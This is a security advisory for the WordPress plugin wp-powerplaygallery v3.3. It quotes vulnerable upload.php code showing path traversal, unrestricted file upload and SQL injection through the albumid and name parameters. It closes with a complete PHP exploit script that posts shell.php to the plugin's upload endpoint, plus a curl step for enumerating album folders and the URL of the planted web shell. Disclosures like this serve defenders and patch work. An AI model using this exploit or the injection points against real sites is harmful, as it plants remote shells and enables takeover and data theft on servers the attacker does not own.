Title:Remote file upload vulnerability & Blind SQLi in wordpress plugin wp-powerplaygallery v3.3
1. Ability to create directories out side of the upload path by using ../:
Lines 56-59 of upload.php:

56 // Create target dir
57 if (!file_exists($targetDir)) {
58         @mkdir($targetDir);
59 }      

2. Arbitrary file uploads to a path in the web root directory:
Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed:

138 // Open temp file
139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
140         die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" :     "id"}');
141 }
142 
143 if (!empty($_FILES)) {
144         if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
145                 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}    , "id" : "id"}');
146         }
147 
148         // Read binary input stream and append it to temp file
149         if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
151         }
152 } else {
153         if (!$in = @fopen("php://input", "rb")) {
154                 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},     "id" : "id"}');
155         }
156 }
157 
158 while ($buff = fread($in, 4096)) {
159         fwrite($out, $buff);
160 }

3. Sql injection 
Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are
any GET/POST to albumid or name.

131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `    image`, `status`, `order`, `creation_date` )
132           VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST    ['name']."',1,'','NULL')";
133 
134           $wpdb->query($query);
135 
<?php
/*Remote shell upload exploit for wp-powerplaygallery v3.3 */
/*Larry W. Cashdollar @_larry0
6/27/2015
albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
but you can enumerate these by using curl, and looking for redirect 301 responses:
e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
->301 exists else 404 doesn't.
shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/


	$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
	$file_name_with_full_path = '/var/www/shell.php';

        echo "POST to $target_url $file_name_with_full_path";
	$post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);
 
        $ch = curl_init();
	curl_setopt($ch, CURLOPT_URL,$target_url);
	curl_setopt($ch, CURLOPT_POST,1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
	$result=curl_exec ($ch);
	curl_close ($ch);
        echo "<hr>";
	echo $result;
        echo "<hr>";
?>